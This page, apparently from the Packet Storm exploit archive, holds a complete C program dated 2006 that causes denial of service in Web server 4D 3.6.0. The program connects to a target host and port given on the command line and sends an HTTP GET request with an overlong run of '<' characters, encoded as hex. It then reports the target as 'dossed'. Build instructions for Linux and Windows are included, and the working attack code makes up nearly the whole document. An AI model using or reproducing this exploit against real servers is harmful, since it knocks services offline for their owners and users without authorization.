what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Webserver4D.txt

Webserver4D.txt
Posted Jun 11, 2006
Authored by Federico Fazzi

Web server 4D 3.6.0 remote DOS exploit.

tags | exploit, remote, web
SHA-256 | 9ecb021967a204a4e0c6a30ce25bba730abc3141dc7ffad2d9d627831ae2f3b7

Webserver4D.txt

Change Mirror Download
/* Web server 4D 3.6.0 denial of service       */
/* bug found by badpack3t. */
/* ftp://ftp.mdgcs.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe */
/* */
/* $ gcc -o f_ws4d f_ws4d.c (linux version) */
/* $ gcc -o f_ws4d f_ws4d.c -DWINDOWS (windows version) */
/* */
/* $ ./f_ws4d <hostname/ip> <port> */
/* */
/* Federico Fazzi <federico@autistici.org> */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#if WINDOWS
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

int usage(char *f);

char f_call[] =
"\x47\x45\x54\x20\x2F\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\x20";

int main(int argc, char *argv[]) {

#if WINDOWS
WSADATA wsaData;
WORD wVersionRequested;
int port;
int size;
SOCKET sockfd;
#else
int sockfd;
socklen_t size;
in_port_t port = atoi(argv[2]);
#endif

struct sockaddr_in structaddr;
struct hostent *sockhost;
char *reply = (char *)malloc(512);

if(argc < 2) usage((char *) basename(argv[0]));

#if WINDOWS
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
#endif
printf("* Webserver 4D 3.6.0 denial of service\n\n");
#if WINDOWS
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
INVALID_SOCKET) {
perror("socket_func");
exit(1);
}
#else
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket_func");
exit(1);
}
#endif

printf("getting socket.. done!\n");

sockhost = gethostbyname(argv[1]);
if(sockhost == NULL) herror("gethostbyname_func");

size = sizeof(structaddr);
memset((void *) &structaddr, 0x00, size);
bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length);
structaddr.sin_family = AF_INET;
structaddr.sin_port = htons((u_short)port);

printf("getting connection.. ");
if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) {
printf("error!\n");
perror("connect_func");
exit(1);
}
printf("done!\n");

printf("sending exploit in hex format.. ");
if(write(sockfd, f_call, sizeof(f_call)) == -1) {
printf("error!\n");
perror("send_func");
exit(1);
}
printf("done!\n");

printf("target: %s on port %d have been dossed!\n\n",
sockhost->h_name, port);
#if WINDOWS
closesocket(sockfd);
#else
close(sockfd);
#endif
return(0);
}

int usage(char *f) {

printf("Webserver 4D 3.6.0 denial of service\n");
printf("Federico Fazzi <federico@autistici.org\n\n");
printf("$ gcc -o %s %s (linux version)\n", f, __FILE__);
printf("$ gcc -o %s %s -DWINDOWS (windows version\n", f, __FILE__);

return(1);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close